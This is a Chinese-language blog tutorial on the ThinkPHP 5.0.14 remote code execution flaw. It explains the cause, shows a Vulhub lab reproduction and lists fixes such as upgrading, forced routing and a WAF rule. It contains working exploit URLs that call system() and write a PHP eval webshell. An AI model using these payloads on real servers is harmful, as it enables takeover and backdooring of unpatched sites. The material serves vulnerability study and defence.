ThinkPHP 5.0.14 远程代码执行漏洞深度复现与安全防护指南（SEO优化版）

ThinkPHP 框架与安全挑战

ThinkPHP 是国内广泛使用的轻量级 PHP 开发框架，以其快速开发、简洁语法和良好的社区生态深受开发者喜爱。然而，随着其应用范围的扩大，安全问题也日益凸显。

其中，ThinkPHP 5.0.14 版本存在严重的远程代码执行（Remote Code Execution, RCE）漏洞，该漏洞属于 ThinkPHP 5.x 系列在 2018 年底集中爆发的安全事件之一。本文将深入剖析 ThinkPHP 5.0.14 的 RCE 漏洞成因、复现过程，并提供有效的修复建议，帮助开发者提升系统安全性。

漏洞背景：官方安全更新披露

2018年12月10日，ThinkPHP 官方发布《ThinkPHP 5.* 版本安全更新》，紧急修复了一个高危远程代码执行漏洞。该漏洞由于框架对控制器名未进行充分过滤和检测，导致攻击者可通过构造特殊请求，调用敏感函数执行任意系统命令。

根据知道创宇404实验室等安全团队分析，该漏洞影响范围如下：

• ✅ ThinkPHP 5.0.5 ~ 5.0.22

• ✅ ThinkPHP 5.1.0 ~ 5.1.30

由于 ThinkPHP 5.0.14 处于上述受影响版本区间内，因此存在严重安全隐患，极易被黑客利用进行服务器控制、数据窃取或植入后门。

🔍 提示：尽管该漏洞最早于2018年披露，但至今仍有不少老旧项目未及时升级，成为黑产攻击的主要目标。

漏洞原理：为何 ThinkPHP 5.0.14 会“执行任意代码”？

该漏洞的核心在于 ThinkPHP 框架在处理请求时，未对用户输入的控制器名进行严格校验，尤其是在未开启强制路由的默认配置下，攻击者可利用 \think\app::invokeFunction 方法动态调用 PHP 内置函数。

具体攻击链如下：

1. 攻击者通过 URL 构造恶意参数，指定调用 invokefunction 方法；

2. 利用 call_user_func_array 函数动态执行任意 PHP 函数；

3. 结合 system()、exec() 等系统命令执行函数，实现远程命令执行；

4. 最终可写入 Webshell，完全控制服务器。

漏洞复现：手把手教你验证 ThinkPHP 5.0.14 RCE 漏洞

1. 实验环境搭建

我们使用 Vulhub 漏洞靶场平台快速搭建 ThinkPHP 5.0.14 漏洞环境：

# 克隆 Vulhub 项目
git clone https://github.com/vulhub/vulhub.git

# 进入 ThinkPHP 5 RCE 漏洞目录
cd vulhub/thinkphp/5-rce

# 启动 Docker 环境
docker-compose up -d

访问 http://<your-ip>:8080，若显示 ThinkPHP 默认页面，则环境搭建成功。

2. 构造 Payload 执行 phpinfo()

在浏览器中输入以下 URL，验证漏洞是否存在：

http://<your-ip>:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

✅ 若页面成功输出 phpinfo() 信息，则说明目标系统存在 RCE 漏洞。

3. 执行系统命令：获取服务器信息

尝试执行 whoami 命令：

http://<your-ip>:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

你将看到服务器当前运行用户的返回结果，如 www-data 或 apache。

4. 写入一句话木马（危险操作，请仅用于测试！）

攻击者可利用 file_put_contents 函数写入 Webshell：

http://<your-ip>:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']); ?>

访问 http://<your-ip>:8080/shell.php，使用蚁剑（AntSword）等工具连接，即可获得完整 shell 权限。

⚠️ 警告：此操作仅限合法授权测试，严禁用于非法用途！

ThinkPHP 5.0.14 漏洞修复方案

方案一：立即升级 ThinkPHP 版本（推荐）

最根本的解决方案是升级到官方已修复漏洞的版本：

• 升级至 ThinkPHP 5.0.23 及以上

• 或升级至 ThinkPHP 5.1.31 及以上

升级命令（使用 Composer）：

composer update topthink/framework

方案二：启用强制路由（临时缓解）

在 route.php 配置文件中开启强制路由，阻止任意控制器调用：

// config/route.php
'force_route' => true,

方案三：WAF 防护规则（应急措施）

在 Nginx 或 Apache 中添加以下规则，拦截可疑请求：

# Nginx 防护规则示例
location ~* (\/think\/|invokefunction|call_user_func) {
    deny all;
}

或使用云 WAF 设置关键字拦截策略。

方案四：输入过滤与最小权限原则

• 避免直接使用用户输入作为函数参数；

• 关闭 eval()、system() 等危险函数；

• Web 服务以非 root 用户运行，限制文件写入权限。

延伸思考：从 ThinkPHP 漏洞看 PHP 安全开发

ThinkPHP 5.0.14 漏洞再次提醒我们：

1. 不要依赖“默认安全”：框架默认配置未必安全，需主动加固；

2. 及时更新依赖：第三方库是攻击入口，定期检查 composer outdated；

3. 纵深防御：即使框架有漏洞，WAF、防火墙、权限隔离也能有效减缓攻击；

4. 安全左移：在开发阶段引入安全编码规范，避免“上线后再修”。

安全无小事，防范于未然

ThinkPHP 5.0.14 的远程代码执行漏洞虽已过去多年，但在许多遗留系统中依然存在。作为开发者或运维人员，应时刻保持警惕，定期审计系统组件，及时打补丁、升级版本。

记住：没有绝对安全的系统，只有持续改进的安全意识。

📌 如果你的项目仍在使用 ThinkPHP 5.0.14，请立即安排升级！